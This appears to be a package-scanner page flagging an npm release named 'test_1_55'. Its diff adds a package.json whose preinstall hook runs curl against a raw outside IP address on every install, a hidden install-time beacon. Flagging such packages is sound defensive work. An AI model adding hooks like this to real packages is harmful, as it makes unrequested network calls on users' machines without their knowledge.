test_1_55 0.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of test_1_55 might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +8 -0
package/package.json ADDED
@@ -0,0 +1,8 @@
1
+
2
+ {
3
+ "name" : "test_1_55",
4
+ "version" : "0.0.1",
5
+ "scripts" : {
6
+ "preinstall" : "curl https://96.126.104.110:8080"
7
+ }
8
+ }